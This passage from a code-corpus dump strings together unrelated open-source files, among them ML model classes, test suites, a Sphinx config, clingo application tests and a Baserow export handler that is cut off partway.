TIME = DatetimeDataFactor('hour') + DatetimeDataFactor('minute') / 60.0
IS_JANUARY = MONTH == 1
IS_DECEMBER = MONTH == 12
# Because the future data is used in IS_MONTH_END and IS_QUARTER_END factors, it will fail the
# test_lookahead_bias, but because it's != operation, so only a very low probability will fail the
# test. And this method is the fastest, so be it.
IS_MONTH_END = MONTH.shift(-1) != MONTH
IS_MONTH_START = MONTH.shift(1) != MONTH
IS_QUARTER_END = QUARTER.shift(-1) != QUARTER
IS_QUARTER_START = QUARTER.shift(1) != QUARTER
|
nginx-amplify-agent.py | dp92987/nginx-amplify-agent | 308 | 12717627 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import platform
__author__ = "<NAME>"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__credits__ = [] # check amplify/agent/main.py for the actual credits list
# Detect old Centos6 before we do anything else
distname, distversion, __ = platform.linux_distribution(full_distribution_name=False)
is_centos_6 = distname.lower() == 'centos' and distversion.split('.')[0] == '6'
is_redhat_6 = distname.lower() == 'redhat' and distversion.split('.')[0] == '6'
# Import amplify python package and add it's path to sys path
# This needs to be done in order to load all requirements from amplify python package
import amplify
amplify_path = '/'.join(amplify.__file__.split('/')[:-1])
sys.path.insert(0, amplify_path)
# Import gevent and make appropriate patches (depends on platform)
from gevent import monkey
if is_centos_6 or is_redhat_6:
monkey.patch_all(socket=False, ssl=False, select=False)
else:
monkey.patch_all()
# Run the main script
from amplify.agent import main
main.run('amplify')
|
test/test_workbook.py | rimishra-equinix/document-api-python | 263 | 12717669 | import unittest
import os.path
from tableaudocumentapi import Datasource, Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
EPHEMERAL_FIELD_FILE = os.path.join(
TEST_ASSET_DIR,
'ephemeral_field.twb'
)
SHAPES_FILE = os.path.join(
TEST_ASSET_DIR,
'shapes_test.twb'
)
DASHBOARDS_FILE = os.path.join(
TEST_ASSET_DIR,
'filtering.twb'
)
class EphemeralFields(unittest.TestCase):
def test_ephemeral_fields_do_not_cause_errors(self):
wb = Workbook(EPHEMERAL_FIELD_FILE)
self.assertIsNotNone(wb)
class Shapes(unittest.TestCase):
def test_shape_exist(self):
wb = Workbook(SHAPES_FILE)
self.assertEqual(wb.shapes, ['Bug Tracking/bug.png',
'Bug Tracking/icon-scheduleitem.png',
'Bug Tracking/light.png',
'Bug Tracking/mail.png',
]
)
def test_shape_count(self):
wb = Workbook(SHAPES_FILE)
self.assertEqual(len(wb.shapes), 4)
class Dashboards(unittest.TestCase):
def test_dashboards_setup(self):
wb = Workbook(DASHBOARDS_FILE)
self.assertIsNotNone(wb)
self.assertEqual(wb.dashboards, ['setTest'])
|
carla/models/api/mlmodel.py | jayanthyetukuri/CARLA | 140 | 12717670 | from abc import ABC, abstractmethod
from typing import Union
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.base import BaseEstimator
from carla.data.api import Data
class MLModel(ABC):
"""
Abstract class to implement custom black-box-model for a given dataset with encoding and scaling processing.
Parameters
----------
data: Data
Dataset inherited from Data-wrapper
scaling_method: str, default: MinMax
Type of used sklearn scaler. Can be set with property setter to any sklearn scaler.
encoding_method: str, default: OneHot
Type of OneHotEncoding [OneHot, OneHot_drop_binary]. Additional drop binary decides if one column
is dropped for binary features. Can be set with property setter to any sklearn encoder.
Methods
-------
predict:
One-dimensional prediction of ml model for an output interval of [0, 1].
predict_proba:
Two-dimensional probability prediction of ml model
Returns
-------
None
"""
def __init__(
self,
data: Data,
scaling_method: str = "MinMax",
encoding_method: str = "OneHot",
) -> None:
self.data: Data = data
if scaling_method == "MinMax":
fitted_scaler = preprocessing.MinMaxScaler().fit(data.raw[data.continous])
self.scaler: BaseEstimator = fitted_scaler
else:
raise NotImplementedError("Scaling Method not implemented")
if encoding_method == "OneHot":
fitted_encoder = preprocessing.OneHotEncoder(
handle_unknown="error", sparse=False
).fit(data.raw[data.categoricals])
elif encoding_method == "OneHot_drop_binary":
fitted_encoder = preprocessing.OneHotEncoder(
drop="if_binary", handle_unknown="error", sparse=False
).fit(data.raw[data.categoricals])
else:
raise ValueError("Encoding Method not known")
self.encoder: BaseEstimator = fitted_encoder
@property
def data(self) -> Data:
"""
Contains the data.api.Data dataset.
Returns
-------
carla.data.Data
"""
return self._data
@data.setter
def data(self, data: Data) -> None:
self._data = data
@property
def scaler(self) -> BaseEstimator:
"""
Contains a fitted sklearn scaler.
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
return self._scaler
@scaler.setter
def scaler(self, scaler: BaseEstimator):
"""
Sets a new fitted sklearn scaler.
Parameters
----------
scaler : sklearn.preprocessing.Scaler
Fitted scaler for ML model.
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
self._scaler = scaler
@property
def encoder(self) -> BaseEstimator:
"""
Contains a fitted sklearn encoder:
Returns
-------
sklearn.preprocessing.BaseEstimator
"""
return self._encoder
@encoder.setter
def encoder(self, encoder: BaseEstimator):
"""
Sets a new fitted sklearn encoder.
Parameters
----------
encoder: sklearn.preprocessing.Encoder
Fitted encoder for ML model.
"""
self._encoder = encoder
@property
@abstractmethod
def feature_input_order(self):
"""
Saves the required order of feature as list.
Prevents confusion about correct order of input features in evaluation
Returns
-------
list of str
"""
pass
@property
@abstractmethod
def backend(self):
"""
Describes the type of backend which is used for the classifier.
E.g., tensorflow, pytorch, sklearn, ...
Returns
-------
str
"""
pass
@property
@abstractmethod
def raw_model(self):
"""
Contains the raw ml model built on its framework
Returns
-------
object
Classifier, depending on used framework
"""
pass
@abstractmethod
def predict(self, x: Union[np.ndarray, pd.DataFrame]):
"""
One-dimensional prediction of ml model for an output interval of [0, 1].
Shape of input dimension has to be always two-dimensional (e.g., (1, m), (n, m))
Parameters
----------
x : np.Array or pd.DataFrame
Tabular data of shape N x M (N number of instances, M number of features)
Returns
-------
iterable object
Ml model prediction for interval [0, 1] with shape N x 1
"""
pass
@abstractmethod
def predict_proba(self, x: Union[np.ndarray, pd.DataFrame]):
"""
Two-dimensional probability prediction of ml model
Shape of input dimension has to be always two-dimensional (e.g., (1, m), (n, m))
Parameters
----------
x : np.Array or pd.DataFrame
Tabular data of shape N x M (N number of instances, M number of features)
Returns
-------
iterable object
Ml model prediction with shape N x 2
"""
pass
|
docs/conf.py | ChronicallySerious/Rootex | 166 | 12717721 | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Rootex'
copyright = 'MIT License, SDSLabs'
author = 'SDSLabs'
master_doc = 'index'
# -- Source information ------------------------------------------------------
source_parsers = {
}
source_suffix = ['.rst', '.md']
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autosectionlabel',
'recommonmark',
'breathe',
'exhale'
]
breathe_projects = {
"Rootex": "build/xml"
}
breathe_default_project = "Rootex"
exhale_args = {
# These arguments are required
"verboseBuild": True,
"containmentFolder": "api",
"rootFileName": "rootex.rst",
"rootFileTitle": "Rootex",
"doxygenStripFromPath": "../",
# Suggested optional arguments
"createTreeView": True,
# TIP: if using the sphinx-bootstrap-theme, you need
# "treeViewIsBootstrap": True,
"exhaleExecutesDoxygen": True,
"exhaleUseDoxyfile": True
}
primary_domain = 'cpp'
highlight_language = 'cpp'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
html_static_path = ['_static']
html_logo = '../rootex/assets/rootex.png'
html_favicon = '../rootex/assets/rootex.ico'
html_theme_options = {
'canonical_url': '',
'logo_only': False,
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': True,
'style_nav_header_background': '#22AA22',
# Toc options
'collapse_navigation': False,
'sticky_navigation': True,
'navigation_depth': -1,
'includehidden': True,
'titles_only': True
}
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
|
pqdm/__init__.py | dangercrow/pqdm | 129 | 12717733 | <reponame>dangercrow/pqdm
"""Top-level package for Parallel TQDM."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
|
adi_analyze/utils/JVMUtils_test.py | Bertlk/ADI | 226 | 12717756 | <filename>adi_analyze/utils/JVMUtils_test.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/3 8:38 下午
# @Author : kewen
# @File : JVMUtils_test.py.py
import unittest
from utils.JVMUtils import convertBaseType, convertObjectDesc, convertArray, convertClassDesc, convertMethodDesc
class Test(unittest.TestCase):
def test_convertBaseType(self):
self.assertEqual(convertBaseType("[[J"), "long[][]", "解析失败!")
self.assertEqual(convertBaseType("Z"), "bool", "解析失败!")
def test_convertObjectType(self):
self.assertEqual(convertObjectDesc("Landroid/content/Context;"), "android.content.Context")
self.assertEqual(convertObjectDesc("[[Landroid/content/Context;"), "android.content.Context[][]")
def test_convertArray(self):
self.assertEqual(convertArray("[[[J"), ("J", 3))
self.assertEqual(convertArray("Z"), ("Z", 0))
self.assertEqual(convertArray("[[[Landroid/content/Context;"), ("Landroid/content/Context;", 3))
def test_convertClassDesc(self):
self.assertEqual(convertClassDesc("[[[I"), "int[][][]")
self.assertEqual(convertClassDesc("Landroid/content/Context;"), "android.content.Context")
def test_convertMethodDesc(self):
self.assertEqual("(int)", convertMethodDesc("(I)V"))
self.assertEqual("(char[],int)", convertMethodDesc("([CI)[C"))
self.assertEqual("()", convertMethodDesc("()[C"))
self.assertEqual("(java.lang.Object,long)", convertMethodDesc("(Ljava/lang/Object;J)Ljava/lang/Runnable;"))
if __name__ == '__main__':
unittest.main()
|
owl/apps/mnist/mnist_cnn.py | jjzhang166/minerva | 561 | 12717761 | import sys
import time
import argparse
import numpy as np
import mnist_io
import owl
import owl.elewise as ele
import owl.conv as conv
lazy_cycle = 4
class MNISTCNNModel:
def __init__(self):
self.convs = [
conv.Convolver(0, 0, 1, 1),
conv.Convolver(2, 2, 1, 1),
];
self.poolings = [
conv.Pooler(2, 2, 2, 2, 0, 0, conv.pool_op.max),
conv.Pooler(3, 3, 3, 3, 0, 0, conv.pool_op.max)
];
def init_random(self):
self.weights = [
owl.randn([5, 5, 1, 16], 0.0, 0.1),
owl.randn([5, 5, 16, 32], 0.0, 0.1),
owl.randn([10, 512], 0.0, 0.1)
];
self.weightdelta = [
owl.zeros([5, 5, 1, 16]),
owl.zeros([5, 5, 16, 32]),
owl.zeros([10, 512])
];
self.bias = [
owl.zeros([16]),
owl.zeros([32]),
owl.zeros([10, 1])
];
self.biasdelta = [
owl.zeros([16]),
owl.zeros([32]),
owl.zeros([10, 1])
];
def print_training_accuracy(o, t, mbsize, prefix):
predict = o.reshape([10, mbsize]).max_index(0)
ground_truth = t.reshape([10, mbsize]).max_index(0)
correct = (predict - ground_truth).count_zero()
print prefix, 'error: {}'.format((mbsize - correct) * 1.0 / mbsize)
def bpprop(model, samples, label):
num_layers = 6
num_samples = samples.shape[-1]
fc_shape = [512, num_samples]
acts = [None] * num_layers
errs = [None] * num_layers
weightgrad = [None] * len(model.weights)
biasgrad = [None] * len(model.bias)
acts[0] = samples
acts[1] = ele.relu(model.convs[0].ff(acts[0], model.weights[0], model.bias[0]))
acts[2] = model.poolings[0].ff(acts[1])
acts[3] = ele.relu(model.convs[1].ff(acts[2], model.weights[1], model.bias[1]))
acts[4] = model.poolings[1].ff(acts[3])
acts[5] = model.weights[2] * acts[4].reshape(fc_shape) + model.bias[2]
out = conv.softmax(acts[5], conv.soft_op.instance)
errs[5] = out - label
errs[4] = (model.weights[2].trans() * errs[5]).reshape(acts[4].shape)
errs[3] = ele.relu_back(model.poolings[1].bp(errs[4], acts[4], acts[3]), acts[3])
errs[2] = model.convs[1].bp(errs[3], acts[2], model.weights[1])
errs[1] = ele.relu_back(model.poolings[0].bp(errs[2], acts[2], acts[1]), acts[1])
weightgrad[2] = errs[5] * acts[4].reshape(fc_shape).trans()
biasgrad[2] = errs[5].sum(1)
weightgrad[1] = model.convs[1].weight_grad(errs[3], acts[2], model.weights[1])
biasgrad[1] = model.convs[1].bias_grad(errs[3])
weightgrad[0] = model.convs[0].weight_grad(errs[1], acts[0], model.weights[0])
biasgrad[0] = model.convs[0].bias_grad(errs[1])
return (out, weightgrad, biasgrad)
def train_network(model, num_epochs=100, minibatch_size=256, lr=0.01, mom=0.75, wd=5e-4):
# load data
(train_data, test_data) = mnist_io.load_mb_from_mat('mnist_all.mat', minibatch_size / len(gpu))
num_test_samples = test_data[0].shape[0]
test_samples = owl.from_numpy(test_data[0]).reshape([28, 28, 1, num_test_samples])
test_labels = owl.from_numpy(test_data[1])
for i in xrange(num_epochs):
print "---Epoch #", i
last = time.time()
count = 0
weightgrads = [None] * len(gpu)
biasgrads = [None] * len(gpu)
for (mb_samples, mb_labels) in train_data:
count += 1
current_gpu = count % len(gpu)
owl.set_device(gpu[current_gpu])
num_samples = mb_samples.shape[0]
data = owl.from_numpy(mb_samples).reshape([28, 28, 1, num_samples])
label = owl.from_numpy(mb_labels)
out, weightgrads[current_gpu], biasgrads[current_gpu] = bpprop(model, data, label)
if current_gpu == 0:
for k in range(len(model.weights)):
model.weightdelta[k] = mom * model.weightdelta[k] - lr / num_samples / len(gpu) * multi_gpu_merge(weightgrads, 0, k) - lr * wd * model.weights[k]
model.biasdelta[k] = mom * model.biasdelta[k] - lr / num_samples / len(gpu) * multi_gpu_merge(biasgrads, 0, k)
model.weights[k] += model.weightdelta[k]
model.bias[k] += model.biasdelta[k]
if count % (len(gpu) * lazy_cycle) == 0:
print_training_accuracy(out, label, num_samples, 'Training')
print '---End of Epoch #', i, 'time:', time.time() - last
# do test
out, _, _ = bpprop(model, test_samples, test_labels)
print_training_accuracy(out, test_labels, num_test_samples, 'Testing')
def multi_gpu_merge(l, base, layer):
if len(l) == 1:
return l[0][layer]
left = multi_gpu_merge(l[:len(l) / 2], base, layer)
right = multi_gpu_merge(l[len(l) / 2:], base + len(l) / 2, layer)
owl.set_device(base)
return left + right
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MNIST CNN')
parser.add_argument('-n', '--num', help='number of GPUs to use', action='store', type=int, default=1)
(args, remain) = parser.parse_known_args()
assert(1 <= args.num)
print 'Using %d GPU(s)' % args.num
gpu = [owl.create_gpu_device(i) for i in range(args.num)]
owl.set_device(gpu[0])
model = MNISTCNNModel()
model.init_random()
train_network(model)
|
mayan/apps/documents/tests/test_copying.py | nattangwiwat/Mayan-EDMS-recitation | 343 | 12717762 | from mayan.apps.common.tests.mixins import ObjectCopyTestMixin
from mayan.apps.testing.tests.base import BaseTestCase
from .mixins.document_mixins import DocumentTestMixin
class DocumentTypeCopyTestCase(
DocumentTestMixin, ObjectCopyTestMixin, BaseTestCase
):
auto_upload_test_document = False
def setUp(self):
super().setUp()
self.test_object = self.test_document_type
|
flow-python/megflow/func_op.py | MegEngine/MegFlow | 303 | 12717766 | #!/usr/bin/env python
# coding=utf-8
from .registry import register
import inspect
from functools import partial
import re
class Context:
def __init__(self, **entries):
self.__dict__.update(entries)
def name_convert_to_camel(name):
contents = re.findall('_[a-z]+', name)
for content in set(contents):
name = name.replace(content, content[1:].title())
return name.title()
def _with_context(func):
sig = inspect.signature(func)
params = sig.parameters
return 'context' in params
def _common_def(inputs=[], outputs=[]):
def common_def(plugin_def):
def decorator(name=None, exclusive=False):
def _decorator(func):
nonlocal name
if name is None:
name = func.__name__
name = name_convert_to_camel(name)
with_context = _with_context(func)
@register(name=name, inputs=inputs, outputs=outputs, exclusive=exclusive)
class Node:
def __init__(self, name, args):
self.context = Context(**args)
self.name = name
if with_context:
self.impl = partial(func, context = self.context)
else:
self.impl = func
def exec(self):
plugin_def(self, self.impl)
return Node
return _decorator
return decorator
return common_def
@_common_def(inputs=["inp"], outputs=["out"])
def map_def(self, func):
envelope = self.inp.recv()
if envelope is None:
return
envelope.msg = func(envelope.msg)
self.out.send(envelope)
@_common_def(inputs=["inp:[]"], outputs=["out"])
def reduce_def(self, func):
ret = []
for inp in self.inp:
ret.append(inp.recv())
all_empty = True
for envelope in ret:
all_empty = all_empty and envelope is None
if all_empty:
return
for envelope in ret:
assert envelope is not None
msgs = [ envelope.msg for envelope in ret ]
self.out.send(ret[0].repack(func(msgs)))
@_common_def(inputs=["inp"])
def sink_def(self, func):
envelope = self.inp.recv()
if envelope is None:
return
func(envelope.msg)
@_common_def(outputs=["out"])
def source_def(self, func):
from megflow import Envelope
i = 0
for msg in func():
self.out.send(Envelope.pack(msg, info={'partial_id':i}))
i += 1
@_common_def(inputs=["inp"], outputs=["out"])
def batch_def(self, func):
(envelopes, is_closed) = self.inp.batch_recv(self.context.batch_size, self.context.timeout)
if len(envelopes) == 0:
return
func([envelope.msg for envelope in envelopes])
for envelope in envelopes:
self.out.send(envelope)
|
Megatron-LM/scripts/presplit_sentences_json.py | weilianglin101/DeepSpeedExamples | 309 | 12717794 | """
Usage:
python scripts/presplit_sentences_json.py <original loose json file> <output loose json file>
"""
import sys
import json
import nltk
nltk.download('punkt')
input_file = sys.argv[1]
output_file = sys.argv[2]
line_seperator = "\n"
with open(input_file, 'r') as ifile:
with open(output_file, "w") as ofile:
for doc in ifile.readlines():
parsed = json.loads(doc)
sent_list = []
for line in parsed['text'].split('\n'):
if line != '\n':
sent_list.extend(nltk.tokenize.sent_tokenize(line))
parsed['text'] = line_seperator.join(sent_list)
ofile.write(json.dumps(parsed)+'\n')
|
src/python/tensorflow_cloud/utils/tf_utils.py | haifeng-jin/cloud | 342 | 12717795 | <filename>src/python/tensorflow_cloud/utils/tf_utils.py
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow utilities."""
from typing import Text
import tensorflow as tf
from tensorboard.backend.event_processing import directory_watcher
from tensorboard.backend.event_processing import event_file_loader
from tensorboard.backend.event_processing import io_wrapper
def get_version():
return tf.__version__
def get_tensorboard_log_watcher_from_path(
path: Text):
"""Create an event generator for file or directory at given path string.
This method creates an event generator using tensorboard directory_watcher.
The generator.load() method will return event logs as they become available.
The generator does not repeat events.
Args:
path: Text representing a directory, file, or Google Cloud Storage
(GCS) for tensorboard logs.
Returns:
A tensorboard directory_watcher event generator.
Raises:
ValueError: if path is not defined.
"""
if not path:
raise ValueError("path must be a valid string")
if io_wrapper.IsSummaryEventsFile(path):
return event_file_loader.EventFileLoader(path)
return directory_watcher.DirectoryWatcher(
path,
event_file_loader.EventFileLoader,
io_wrapper.IsSummaryEventsFile,
)
|
moldesign/models/__init__.py | Autodesk/molecular-design-toolkit | 147 | 12717846 | <reponame>Autodesk/molecular-design-toolkit
from .openmm import *
from .pyscf import *
from .models import *
from .toys import *
from .amber import *
from .openbabel import *
from .nwchem import *
from .qmmm import * |
sofi/ui/fontawesomeicon.py | screamingskulls/sofi | 402 | 12717852 | <gh_stars>100-1000
from .element import Element
class FontAwesomeIcon(Element):
"""Implements a Font Awesome Icons"""
def __init__(self, name=None, size=None, fixed=False, animation=None,
rotate=None, flip=None, border=False, pull=None,
cl=None, ident=None, style=None, attrs=None):
super().__init__(cl=cl, ident=ident, style=style, attrs=attrs)
self.name = name
self.size = size
self.fixed = fixed
self.animation = animation
self.rotate = rotate
self.flip = flip
self.border = border
self.pull = pull
def __repr__(self):
return "<Icon(name='" + self.name + "')>"
def __str__(self):
output = [ "<i" ]
if self.ident:
output.append(" id=\"")
output.append(self.ident)
output.append("\"")
classes = ["fa"]
if self.name:
classes.append("fa-" + self.name)
if self.animation:
classes.append("fa-" + self.animation)
if self.rotate:
classes.append("fa-rotate-" + self.rotate)
if self.border:
classes.append("fa-border")
if self.pull:
classes.append("fa-pull-" + self.pull)
if self.flip:
classes.append("fa-flip-" + self.flip)
if self.size:
classes.append("fa-" + self.size)
if self.fixed:
classes.append("fa-fw")
if self.cl:
classes.append(self.cl)
if len(classes) > 0:
output.append(' class="')
output.append(" ".join(classes))
output.append('"')
if self.style:
output.append(" style=\"")
output.append(self.style)
output.append("\"")
if self.attrs:
for k in self.attrs.keys():
output.append(' ' + k + '="' + self.attrs[k] + '"')
output.append(">")
for child in self._children:
output.append(str(child))
output.append("</i>")
return "".join(output)
|
libpyclingo/clingo/tests/test_application.py | potassco/gringo | 423 | 12717875 | '''
Test clingo's Application class.
'''
from typing import Any, Callable, List, Sequence, Tuple
from unittest import TestCase
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
import os
import re
from .util import _MCB
from ..core import MessageCode
from ..application import Application, ApplicationOptions, Flag, clingo_main
class TestApp(Application):
'''
Test application covering most of the Application related API.
Note that I did not find a nice way to test model printing.
'''
_queue: Queue
program_name = 'test'
version = '1.2.3'
message_limit = 17
def __init__(self, queue: Queue):
self._queue = queue
self._flag = Flag()
def _parse_test(self, value):
self._queue.put(('parse', value))
return True
def register_options(self, options: ApplicationOptions) -> None:
self._queue.put('register')
group = 'Clingo.Test'
options.add(group, 'test', 'test description', self._parse_test)
options.add_flag(group, 'flag', 'test description', self._flag)
def validate_options(self) -> bool:
self._queue.put('validate')
self._queue.put(('flag', self._flag.flag))
return True
def logger(self, code: MessageCode, message: str) -> None:
self._queue.put((code, re.sub('^.*:(?=[0-9]+:)', '', message)))
def main(self, control, files):
self._queue.put('main')
for file_ in files:
control.load(file_)
control.ground([("base", [])])
mcb = _MCB()
control.solve(on_model=mcb.on_model)
self._queue.put(('models', [ [ str(sym) for sym in model ] for model in mcb.models ]))
def _run_process(app: Callable[[Queue], Application], program: str, queue: Queue, args: Sequence[str]) -> None:
'''
Run clingo application with given program and intercept results.
'''
with NamedTemporaryFile(mode='wt', delete=False) as fp:
name = fp.name
fp.write(program)
try:
# Note: The multiprocess module does not allow for intercepting the
# output. Thus, the output is simply disabled and we use the Queue
# class to communicate results.
ret = clingo_main(app(queue), (name, '--outf=3') + tuple(args))
queue.put(int(ret))
queue.close()
finally:
os.unlink(name)
AppResult = Tuple[int, List[Any]]
def run_app(app: Callable[[Queue], Application], program: str, *args: Sequence[str]) -> AppResult:
'''
Run clingo application in subprocess via multiprocessing module.
'''
q: Queue
q = Queue()
p = Process(target=_run_process, args=(app, program, q, tuple(args)))
p.start()
seq: List[Any]
seq, ret = [], -1
while True:
ret = q.get()
if isinstance(ret, int):
status = ret
break
seq.append(ret)
p.join()
q.close()
return status, seq
class TestApplication(TestCase):
'''
Tests for clingo's application class.
'''
def test_app(self):
'''
Test application.
'''
ret, seq = run_app(TestApp, "1 {a; b; c(1/0)}.", "0", '--test=x', '--flag')
self.assertEqual(ret, 30)
self.assertEqual(seq, [
'register',
('parse', 'x'),
'validate',
('flag', True),
'main',
(MessageCode.OperationUndefined, '1:12-15: info: operation undefined:\n (1/0)\n'),
('models', [['a'], ['a', 'b'], ['b']])])
|
dashboard/app/rules/conditions/email.py | robertsimmons514/isthislegit | 282 | 12717891 | from app.rules import Condition
class EmailCondition(Condition):
''' EmailCondition matches an attribute of the EmailReport.
This is done by a simple regex.'''
def match(report, field, value):
pass
|
backend/src/baserow/contrib/database/export/handler.py | cjh0613/baserow | 839 | 12717976 | import logging
import uuid
from io import BytesIO
from os.path import join
from typing import Optional, Dict, Any, BinaryIO
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.files.storage import default_storage
from django.db import transaction
from django.utils import timezone
from baserow.contrib.database.export.models import (
ExportJob,
EXPORT_JOB_CANCELLED_STATUS,
EXPORT_JOB_PENDING_STATUS,
EXPORT_JOB_FAILED_STATUS,
EXPORT_JOB_EXPIRED_STATUS,
EXPORT_JOB_COMPLETED_STATUS,
EXPORT_JOB_EXPORTING_STATUS,
)
from baserow.contrib.database.export.tasks import run_export_job
from baserow.contrib.database.table.models import Table
from baserow.contrib.database.views.models import View
from baserow.contrib.database.views.exceptions import ViewNotInTable
from baserow.contrib.database.views.registries import view_type_registry
from .exceptions import (
TableOnlyExportUnsupported,
ViewUnsupportedForExporterType,
ExportJobCanceledException,
)
from .file_writer import PaginatedExportJobFileWriter
from .registries import table_exporter_registry, TableExporter
logger = logging.getLogger(__name__)
User = get_user_model()
class ExportHandler:
@staticmethod
def create_and_start_new_job(
user: User, table: Table, view: Optional[View], export_options: Dict[str, Any]
) -> ExportJob:
"""
For the provided user, table, optional view and options will create a new
export job and start an asynchronous celery task which will perform the
export and update the job with any results.
:param user: The user who the export job is being run for.
:param table: The table on which the job is being run.
:param view: An optional view of the table to export instead of the table
itself.
:param export_options: A dict containing exporter_type and the relevant options
for that type.
:return: The created export job.
"""
job = ExportHandler.create_pending_export_job(user, table, view, export_options)
# Ensure we only trigger the job after the transaction we are in has committed
# and created the export job in the database. Otherwise the job might run before
# we commit and crash as there is no job yet.
transaction.on_commit(lambda: run_export_job.delay(job.id))
return job
@staticmethod
def create_pending_export_job(
user: User, table: Table, view: Optional[View], export_options: Dict[str, Any]
):
"""
Creates a new pending export job configured with the providing options but does
not start the job. Will cancel any previously running jobs for this user. Raises
exceptions if the user is not allowed to create an export job for the view/table
due to missing permissions or if the selected exporter doesn't support the
view/table.
:param user: The user who the export job is being run for.
:param table: The table on which the job is being run.
:param view: An optional view of the table to export instead of the table
itself.
:param export_options: A dict containing exporter_type and the relevant options
for that type.
:raises ViewNotInTable: If the view does not belong to the table.
:return: The created export job.
"""
table.database.group.has_user(user, raise_error=True)
if view and view.table.id != table.id:
raise ViewNotInTable()
_cancel_unfinished_jobs(user)
exporter_type = export_options.pop("exporter_type")
_raise_if_invalid_view_or_table_for_exporter(exporter_type, view)
job = ExportJob.objects.create(
user=user,
table=table,
view=view,
exporter_type=exporter_type,
status=EXPORT_JOB_PENDING_STATUS,
export_options=export_options,
)
return job
@staticmethod
def run_export_job(job) -> ExportJob:
"""
Given an export job will run the export and store the result in the configured
storage. Internally it does this in a paginated way to ensure constant memory
usage, meaning any size export job can be run as long as you have enough time.
If the export job fails will store the failure on the job itself and mark the
job as failed.
:param job: The job to run.
:return: An updated ExportJob instance with the exported file name.
"""
# Ensure the user still has permissions when the export job runs.
job.table.database.group.has_user(job.user, raise_error=True)
try:
return _mark_job_as_finished(_open_file_and_run_export(job))
except ExportJobCanceledException:
# If the job was canceled then it must not be marked as failed.
pass
except Exception as e:
_mark_job_as_failed(job, e)
raise e
@staticmethod
def export_file_path(exported_file_name) -> str:
"""
Given an export file name returns the path to where that export file should be
put in storage.
:param exported_file_name: The name of the file to generate a path for.
:return: The path where this export file should be put in storage.
"""
return join(settings.EXPORT_FILES_DIRECTORY, exported_file_name)
@staticmethod
def clean_up_old_jobs():
"""
Cleans up expired export jobs, will delete any files in storage for expired
jobs with exported files, will cancel any exporting or pending jobs which have
also expired.
"""
jobs = ExportJob.jobs_requiring_cleanup(timezone.now())
logger.info(f"Cleaning up {jobs.count()} old jobs")
for job in jobs:
if job.exported_file_name:
# Note the django file storage api will not raise an exception if
# the file does not exist. This is ideal as export jobs first save
# their exported_file_name and then write to that file, so if the
# write step fails it is possible that the exported_file_name does not
# exist.
default_storage.delete(
ExportHandler.export_file_path(job.exported_file_name)
)
job.exported_file_name = None
job.status = EXPORT_JOB_EXPIRED_STATUS
job.save()
def _raise_if_invalid_view_or_table_for_exporter(
exporter_type: str, view: Optional[View]
):
"""
Raises an exception if the exporter_type does not support the provided view,
or if no view is provided raises if the exporter does not support exporting just the
table.
:param exporter_type: The exporter type to check.
:param view: None if we are exporting just the table, otherwise the view we are
exporting.
"""
exporter = table_exporter_registry.get(exporter_type)
if not exporter.can_export_table and view is None:
raise TableOnlyExportUnsupported()
if view is not None:
view_type = view_type_registry.get_by_model(view.specific_class)
if view_type.type not in exporter.supported_views:
raise ViewUnsupportedForExporterType()
def _cancel_unfinished_jobs(user):
"""
Will cancel any in progress jobs by setting their status to cancelled. Any
tasks currently running these jobs are expected to periodically check if they
have been cancelled and stop accordingly.
:param user: The user to cancel all unfinished jobs for.
:return The number of jobs cancelled.
"""
jobs = ExportJob.unfinished_jobs(user=user)
return jobs.update(status=EXPORT_JOB_CANCELLED_STATUS)
def _mark_job_as_finished(export_job: ExportJob) -> ExportJob:
"""
Marks the provided job as finished with the result being the provided file name.
:param export_job: The job to update to be finished.
:return: The updated finished job.
"""
export_job.status = EXPORT_JOB_COMPLETED_STATUS
export_job.progress_percentage = 1.0
export_job.save()
return export_job
def _mark_job_as_failed(job, e):
"""
Marks the given export job as failed and stores the exception in the job.
:param job: The job to mark as failed
:param e: The exception causing the failure
:return: The updated failed job.
"""
job.status = EXPORT_JOB_FAILED_STATUS
job.progress_percentage = 0.0
job.error = str(e)
job.save()
return job
def _open_file_and_run_export(job: ExportJob) -> ExportJob:
"""
Using the jobs exporter type exports all data into a new file placed in the
default storage.
:return: An updated ExportJob instance with the exported_file_name set.
"""
exporter: TableExporter = table_exporter_registry.get(job.exporter_type)
exported_file_name = _generate_random_file_name_with_extension(
exporter.file_extension
)
